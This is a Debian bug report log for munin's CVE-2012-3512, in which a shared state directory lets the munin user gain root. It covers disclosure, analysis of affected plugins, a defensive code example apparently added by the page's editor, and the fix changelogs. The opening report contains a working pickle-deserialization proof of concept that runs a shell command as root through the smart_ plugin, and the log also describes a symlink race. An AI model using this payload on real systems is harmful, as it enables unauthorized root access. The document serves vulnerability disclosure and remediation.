munin: CVE-2012-3512: insecure state file handling, munin->root

Related Vulnerabilities: CVE-2012-3512   CVE-2012-3513  

Debian Bug report logs - #684075


Reported by: Stevie Trujillo <stevie.trujillo@gmail.com>

Date: Mon, 6 Aug 2012 18:24:04 UTC

Severity: grave

Tags: security, upstream

Found in versions munin/2.0.2-1, 1.4.5-3, munin/2.0.1-1

Fixed in versions munin/2.0.6~git-1, munin/2.0.6-1

Done: Holger Levsen <holger@debian.org>

Bug is archived. No further changes may be made.

Forwarded to http://www.munin-monitoring.org/ticket/1234




Report forwarded to debian-bugs-dist@lists.debian.org, helmut@subdivi.de, Munin Debian Maintainers <packaging@munin-monitoring.org>:
Bug#684075; Package munin-plugins-core. (Mon, 06 Aug 2012 18:24:06 GMT) (full text, mbox, link).


Acknowledgement sent to Stevie Trujillo <stevie.trujillo@gmail.com>:
New Bug report received and forwarded. Copy sent to helmut@subdivi.de, Munin Debian Maintainers <packaging@munin-monitoring.org>. (Mon, 06 Aug 2012 18:24:07 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Stevie Trujillo <stevie.trujillo@gmail.com>
To: submit@bugs.debian.org
Subject: Subject: munin: insecure state file handling, munin->root privilege escalation in smart_ plugin
Date: Mon, 6 Aug 2012 20:22:32 +0200
Package: munin-plugins-core
Version: 1.4.5-3
Severity: grave
Tags: upstream security
X-Debbugs-CC: helmut@subdivi.de

Hello, copying kenyon's report from
http://www.munin-monitoring.org/ticket/1234 :



Currently, plugins which run as root mix their state files in the same
directory as non-root plugins. The state directory is owned by
munin:munin and is group-writable. Because of these facts, it is
possible for an attacker who operates as user munin to cause a
root-run plugin to run arbitrary code as root.

A proof-of-concept example is the smart_ plugin. It must run as root
to access disk SMART data. It also stores state in Python pickle
format, which can store executable Python code. Example follows:



# su -s /bin/sh -c /bin/sh munin
$ cd /var/lib/munin/plugin-state
$ mv smart-sda.state smart-sda.state.orig
$ cat bla.py
import pickle
import subprocess
import sys

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh', '-c', 'id > /tmp/whoami'),))

pickle.dump(RunBinSh(), sys.stdout)
$ python bla.py > smart-sda.state
# wait for node to run smart_ plugin
$ cat /tmp/whoami
uid=0(root) gid=110(munin) groups=0(root),110(munin)



A possible solution is to have a directory dedicated to each plugin,
especially plugins which may run with superuser privileges, so that
less-privileged users cannot modify their state files. This cannot be
enforced by munin on all plugins, but this can be enforced by munin
developers for plugins shipped with the munin package. We should
consider making it easy for plugin writers to do this, maybe by making
the perl/bourne shell/other language munin plugin API use a dedicated
plugin state directory for each plugin. Otherwise, a plugin could be
hardcoded to create and use a subdirectory of the existing
plugin-state directory.

Thanks to "cnu" on the munin IRC channel for raising this issue and
providing the smart_ example.



Changed Bug title to 'munin: insecure state file handling, munin->root' from 'Subject: munin: insecure state file handling, munin->root privilege escalation in smart_ plugin' Request was from Stevie Trujillo <stevie.trujillo@gmail.com> to control@bugs.debian.org. (Mon, 06 Aug 2012 18:33:05 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Munin Debian Maintainers <packaging@munin-monitoring.org>:
Bug#684075; Package munin-plugins-core. (Tue, 07 Aug 2012 21:21:03 GMT) (full text, mbox, link).


Acknowledgement sent to Holger Levsen <holger@layer-acht.org>:
Extra info received and forwarded to list. Copy sent to Munin Debian Maintainers <packaging@munin-monitoring.org>. (Tue, 07 Aug 2012 21:21:03 GMT) (full text, mbox, link).


Message #12 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Holger Levsen <holger@layer-acht.org>
To: Stevie Trujillo <stevie.trujillo@gmail.com>, 684075@bugs.debian.org
Subject: Re: [Packaging] Bug#684075: Subject: munin: insecure state file handling, munin->root privilege escalation in smart_ plugin
Date: Tue, 7 Aug 2012 23:19:04 +0200
Hi Stevie,

On Montag, 6. August 2012, Stevie Trujillo wrote:
> A possible solution is to have a directory dedicated to each plugin,
> especially plugins which may run with superuser privileges, so that
> less-privileged users cannot modify their state files. This cannot be
> enforced by munin on all plugins, but this can be enforced by munin
> developers for plugins shipped with the munin package. We should
> consider making it easy for plugin writers to do this[...]

thanks for the bug report, I sigh and agree.


cheers,
	Holger



Marked as found in versions munin/2.0.1-1. Request was from Holger Levsen <holger@layer-acht.org> to control@bugs.debian.org. (Wed, 08 Aug 2012 08:45:05 GMT) (full text, mbox, link).


Marked as found in versions munin/2.0.2-1. Request was from Holger Levsen <holger@layer-acht.org> to control@bugs.debian.org. (Wed, 08 Aug 2012 08:45:05 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Munin Debian Maintainers <packaging@munin-monitoring.org>:
Bug#684075; Package munin-plugins-core. (Thu, 09 Aug 2012 07:33:08 GMT) (full text, mbox, link).


Acknowledgement sent to Helmut Grohne <helmut@subdivi.de>:
Extra info received and forwarded to list. Copy sent to Munin Debian Maintainers <packaging@munin-monitoring.org>. (Thu, 09 Aug 2012 07:33:08 GMT) (full text, mbox, link).


Message #21 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Helmut Grohne <helmut@subdivi.de>
To: Debian Bug Tracking System <684075@bugs.debian.org>
Subject: Re: munin: insecure state file handling, munin->root
Date: Thu, 9 Aug 2012 09:29:06 +0200
I investigated whether just fixing the smart_ plugin would be enough of
a workaround for stable. We only have a finite amount of plugins that
can instantiate this vulnerability. Just how many do? Basically we are
interested in those plugins that run with elevated privileges and use
state files. The first restriction reduces the number of plugins to the
following set (assuming default configuration of sid):

apt courier_mta_mailqueue courier_mta_mailstats courier_mta_mailvolume
cps_ exim_mailqueue exim_mailstats fw_conntrack fw_forwarded_local
hddtemp_smartctl hddtemp2 if_ if_err_ ip_ ipmi_ mysql_ mysql_bytes
mysql_innodb mysql_isam_space_ mysql_queries mysql_slowqueries
mysql_threads postfix_mailqueue postfix_mailstats postfix_mailvolume
smart_ vlan_ vlan_inetuse_ vlan_linkuse_ ejabberd_ dhcpd3
jmx_tomcat_dbpools samba postgres_autovacuum postgres_checkpoints
postgres_locks_ postgres_querylength_ postgres_streaming_ postgres_users
postgres_bgwriter postgres_connections_ postgres_oldest_prepared_xact_
postgres_scans_ postgres_transactions_ postgres_xlog postgres_cache_
postgres_connections_db postgres_prepared_xacts_ postgres_size_
postgres_tuples_ fail2ban

Big list. Now let's look at the second condition. Surely the plugin will
somehow have to reference /var/lib/munin/plugin-state. Since plugin.sh
does not give that reference and there is no other library for writing
plugins they will somehow have to mention "plugin-state" (seems like a
safe bet). Filtering those files which contain plugin-state gives us
this list:

apt courier_mta_mailstats courier_mta_mailvolume mysql_isam_space_
smart_

Observations:
 * It is way shorter.
 * It includes smart_ (the original vulnerability), so we didn't over-prune
   this.
 * The list contains more than smart_. :-(

Now to the individual plugins.

 * apt: Well it does check whether its statefile is a symbolic link and
   only if it is not opens a statefile. This is a TOCTOU race condition.
   => Overwriting arbitrary files as root with non-chosen content.
   Another possibility could be to hard link a root owned file you wish
   to truncate. (But that only works on the same device.)
 * courier_mta_mailstats and courier_mta_mailvolume are similar.
 * mysql_isam_space_ does a more tricky check, but gives the same
   result.
 * smart_ gives you root when reading those files.

So my conclusion is that smart_ is the worst offender as there is a
ready-to-use exploit floating around now. Exploiting the other issues
requires more work and possibly additional issues in unrelated software.
Nevertheless just fixing smart_ is not a satisfactory solution, as it
leaves known issues behind.

Helmut
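The two problems raised in this thread, the shared group-writable state directory with pickle-loaded state (first report) and the stat-then-open race in the apt plugin (Helmut's analysis), both come down to how a privileged plugin locates, opens and parses its state file. The following is an added example written for this page, not munin's code: it sketches per-UID state directories like the ones the 2.0.6 fix introduces, validates the descriptor it actually opened instead of the path it was given, and stores plain JSON rather than pickle. The StateError class, the function names and the scratch directory (standing in for the uid-0-owned state root) are assumptions.

```python
import errno
import json
import os
import stat
import tempfile

class StateError(Exception):
    """A state file or directory failed an ownership or mode check."""

def ensure_state_dir(root, uid):
    """Return root/<uid>, created 0700; refuse anything but a real dir owned by uid.
    root stands for the uid-0-owned, non-group-writable root the 2.0.6 fix introduces."""
    path = os.path.join(root, str(uid))
    os.makedirs(path, 0o700, exist_ok=True)  # mode is only narrowed by the umask, never widened
    st = os.lstat(path)  # lstat: a planted symlink must not pass as a directory
    if not stat.S_ISDIR(st.st_mode) or st.st_uid != uid or st.st_mode & 0o022:
        raise StateError("%s is not a private directory owned by uid %d" % (path, uid))
    return path

def open_state_file(path, uid):
    """Open read-only and validate the descriptor we got, not the path we were given."""
    # stat-then-open is the race noted for the apt plugin; fstat on the open fd has no window.
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    except OSError as e:
        if e.errno == errno.ELOOP:  # O_NOFOLLOW refused a symlink
            raise StateError("refusing to follow symlink %s" % path)
        raise
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_uid != uid or st.st_mode & 0o022:
            raise StateError("%s is not a private regular file owned by uid %d" % (path, uid))
        if st.st_nlink != 1:  # a hard link to a root-owned file shares that file's inode
            raise StateError("%s has extra hard links" % path)
    except Exception:
        os.close(fd)
        raise
    return fd

def load_state(path, uid):
    """Parse the state file as JSON (plain data, unlike pickle); {} on first run."""
    try:
        fd = open_state_file(path, uid)
    except FileNotFoundError:
        return {}
    with os.fdopen(fd) as f:
        return json.load(f)

def save_state(path, data):
    """Write atomically: 0600 temp file in the same directory, then rename over path."""
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path), prefix=".state-")
    with os.fdopen(fd, "w") as f:
        json.dump(data, f)
    os.replace(tmp, path)  # rename replaces a symlink planted at path and never follows it

def _refused(path, uid):
    try:
        load_state(path, uid)
    except StateError:
        return True
    return False

def demonstrate(root=None):
    """Run the checks in a scratch directory; report which planted files were refused."""
    root = root or tempfile.mkdtemp()  # 0700 scratch dir standing in for the uid-0 root
    uid = os.getuid()
    state = os.path.join(ensure_state_dir(root, uid), "smart-sda.state")
    save_state(state, {"last_temp": 41})
    results = {"roundtrip": load_state(state, uid) == {"last_temp": 41}}
    victim = os.path.join(root, "victim")  # constructed stand-in for a file the plugin must not open
    open(victim, "w").close()
    os.remove(state)
    os.symlink(victim, state)  # planted symlink in place of the state file
    results["symlink_rejected"] = _refused(state, uid)
    os.remove(state)
    save_state(state, {})
    os.chmod(state, 0o666)  # state file writable by others
    results["writable_rejected"] = _refused(state, uid)
    return results
```

The hard-link case Helmut mentions is covered by the st_nlink check, which the demonstration does not exercise because not every filesystem permits hard links.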



Information forwarded to debian-bugs-dist@lists.debian.org, Munin Debian Maintainers <packaging@munin-monitoring.org>:
Bug#684075; Package munin-plugins-core. (Thu, 09 Aug 2012 08:27:08 GMT) (full text, mbox, link).


Acknowledgement sent to Kenyon Ralph <kenyon@kenyonralph.com>:
Extra info received and forwarded to list. Copy sent to Munin Debian Maintainers <packaging@munin-monitoring.org>. (Thu, 09 Aug 2012 08:27:08 GMT) (full text, mbox, link).


Message #26 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Kenyon Ralph <kenyon@kenyonralph.com>
To: Helmut Grohne <helmut@subdivi.de>, 684075@bugs.debian.org
Subject: Re: Bug#684075: munin: insecure state file handling, munin->root
Date: Thu, 9 Aug 2012 03:18:46 -0500
On 2012-08-09T09:29:06+0200, Helmut Grohne <helmut@subdivi.de> wrote:
> Big list. Now let's look at the second condition. Surely the plugin will
> somehow have to reference /var/lib/munin/plugin-state. Since plugin.sh
> does not give that reference and there is no other library for writing
> plugins they will somehow have to mention "plugin-state" (seems like a
> safe bet). Filtering those files which contain plugin-state gives us
> this list:

There is another library for writing plugins, which provides some
abstraction for state file handling: the Perl library
https://github.com/munin-monitoring/munin/blob/devel/plugins/lib/Munin/Plugin.pm

-- 
Kenyon Ralph

Set Bug forwarded-to-address to 'http://www.munin-monitoring.org/ticket/1234'. Request was from gregor herrmann <gregoa@debian.org> to control@bugs.debian.org. (Mon, 20 Aug 2012 19:45:10 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Munin Debian Maintainers <packaging@munin-monitoring.org>:
Bug#684075; Package munin-plugins-core. (Tue, 21 Aug 2012 05:51:03 GMT) (full text, mbox, link).


Acknowledgement sent to Kurt Seifried <kseifried@redhat.com>:
Extra info received and forwarded to list. Copy sent to Munin Debian Maintainers <packaging@munin-monitoring.org>. (Tue, 21 Aug 2012 05:51:03 GMT) (full text, mbox, link).


Message #33 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Kurt Seifried <kseifried@redhat.com>
To: 684075@bugs.debian.org
Subject: CVE-2012-3512 munin: insecure state file handling, munin->root privilege
Date: Mon, 20 Aug 2012 22:55:50 -0600

CVE-2012-3512 munin: insecure state file handling, munin->root privilege

-- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993




Reply sent to Holger Levsen <holger@debian.org>:
You have taken responsibility. (Thu, 30 Aug 2012 08:51:07 GMT) (full text, mbox, link).


Notification sent to Stevie Trujillo <stevie.trujillo@gmail.com>:
Bug acknowledged by developer. (Thu, 30 Aug 2012 08:51:07 GMT) (full text, mbox, link).


Message #38 received at 684075-close@bugs.debian.org (full text, mbox, reply):

From: Holger Levsen <holger@debian.org>
To: 684075-close@bugs.debian.org
Subject: Bug#684075: fixed in munin 2.0.6~git-1
Date: Thu, 30 Aug 2012 08:48:19 +0000
Source: munin
Source-Version: 2.0.6~git-1

We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684075@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Holger Levsen <holger@debian.org> (supplier of updated munin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)



Format: 1.8
Date: Thu, 30 Aug 2012 08:26:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6~git-1
Distribution: experimental
Urgency: low
Maintainer: Munin Debian Maintainers <packaging@munin-monitoring.org>
Changed-By: Holger Levsen <holger@debian.org>
Description: 
 munin      - network-wide graphing framework (grapher/gatherer)
 munin-async - network-wide graphing framework (async master/client)
 munin-common - network-wide graphing framework (common)
 munin-doc  - network-wide graphing framework (documentation)
 munin-node - network-wide graphing framework (node)
 munin-plugins-core - network-wide graphing framework (plugins for node)
 munin-plugins-extra - network-wide graphing framework (user contributed plugins for nod
 munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes: 
 munin (2.0.6~git-1) experimental; urgency=low
 .
   * 2.0.6 is actually unreleased still, this is based on the current git
     commit 6183662. The following fixes are included:
     - munin-node: more secure state file handling, introducing a new plugin
       state directory root, owned by uid 0. Then each plugin runs in its own
       UID plugin state directory, owned by the said UID. (Closes: #684075),
       (Closes: #679897), closes CVE-2012-3512.
     - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
       thanks to Helmut Grohne <helmut@subdivi.de>
     - munin-cron: call munin-graph with --cron argument (Closes: #685343)
     - Master/Node.pm: fix _node_read_fast() to accept all valid returns
       (Closes: #686089) and _do_connect() to not use an uninitialized
       variable. (Closes: #686090)
     - munin-async: make spoolread less restrictive about (valid) plugin names
       (Closes: #686093)
   * Update Location and Scriptalias in shipped apache.conf to reflect changes
     introduced upstream in 64dfec73 coming in 2.0.6. This fixes a regression
     introduced in fixing #682869.





Reply sent to Holger Levsen <holger@debian.org>:
You have taken responsibility. (Mon, 03 Sep 2012 13:18:18 GMT) (full text, mbox, link).


Notification sent to Stevie Trujillo <stevie.trujillo@gmail.com>:
Bug acknowledged by developer. (Mon, 03 Sep 2012 13:18:18 GMT) (full text, mbox, link).


Message #43 received at 684075-close@bugs.debian.org (full text, mbox, reply):

From: Holger Levsen <holger@debian.org>
To: 684075-close@bugs.debian.org
Subject: Bug#684075: fixed in munin 2.0.6-1
Date: Mon, 03 Sep 2012 13:17:47 +0000
Source: munin
Source-Version: 2.0.6-1

We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684075@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Holger Levsen <holger@debian.org> (supplier of updated munin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)



Format: 1.8
Date: Mon, 03 Sep 2012 12:42:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6-1
Distribution: unstable
Urgency: high
Maintainer: Munin Debian Maintainers <packaging@munin-monitoring.org>
Changed-By: Holger Levsen <holger@debian.org>
Description: 
 munin      - network-wide graphing framework (grapher/gatherer)
 munin-async - network-wide graphing framework (async master/client)
 munin-common - network-wide graphing framework (common)
 munin-doc  - network-wide graphing framework (documentation)
 munin-node - network-wide graphing framework (node)
 munin-plugins-core - network-wide graphing framework (plugins for node)
 munin-plugins-extra - network-wide graphing framework (user contributed plugins for nod
 munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes: 
 munin (2.0.6-1) unstable; urgency=high
 .
   * New upstream release 2.0.6, switching back to cron graphing (as it is better
     for small setups) and besides that only containing bugfixes, but many of
     them. See the upstream ChangeLog for the full list.
     - munin-node: more secure state file handling, introducing a new plugin
       state directory root, owned by uid 0. Then each plugin runs in its own
       UID plugin state directory, owned by the said UID. (Closes: #684075),
       (Closes: #679897), closes CVE-2012-3512.
       So all properly written plugins will use
       /var/lib/munin-node/plugin-state/$uid/$some_file now - please report
       plugins that are still using /var/lib/munin/plugin-state/ - as those
       might pose a security risk!
     - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
       thanks to Helmut Grohne <helmut@subdivi.de>
     - munin-cron: call munin-graph with --cron argument (Closes: #685343)
     - Master/Node.pm: fix _node_read_fast() to accept all valid returns
       (Closes: #686089) and _do_connect() to not use an uninitialized
       variable. (Closes: #686090)
     - munin-async: make spoolread less restrictive about (valid) plugin names
       (Closes: #686093)
   * Update Location and Scriptalias in shipped apache.conf to fix a regression
     introduced in fixing #682869.
   * munin-node.postinst: don't create /var/lib/munin/plugin-state anymore as
     munin-node now uses /var/lib/munin-nodes/plugin-state and subdirs and
     handles creation by itself.
   * debian/rules: workaround bug in upstream Makefile targets to move
     /var/lib/async from munin-node package to munin-async.
   * debian/control:
     - make munin-async depend on munin-node for now.
     - update Vcs: headers to point to an up-to-date repository.
   * Remove build/resources/apache-cgi.conf from munin.docs as it's outdated.
   * update munin.NEWS to reflect that everybody using cgi graphing needs to
     update the configuration files and that cron graphing is the default
     again. (cgi graphing was the default from pre-2.0 until 2.0.5)





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Thu, 04 Oct 2012 07:27:20 GMT) (full text, mbox, link).


Bug unarchived. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 02 Dec 2013 19:33:07 GMT) (full text, mbox, link).


Changed Bug title to 'munin: CVE-2012-3512: insecure state file handling, munin->root' from 'munin: insecure state file handling, munin->root' Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 02 Dec 2013 19:33:12 GMT) (full text, mbox, link).


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 31 Dec 2013 07:47:37 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:42:06 2019; Machine Name: beach
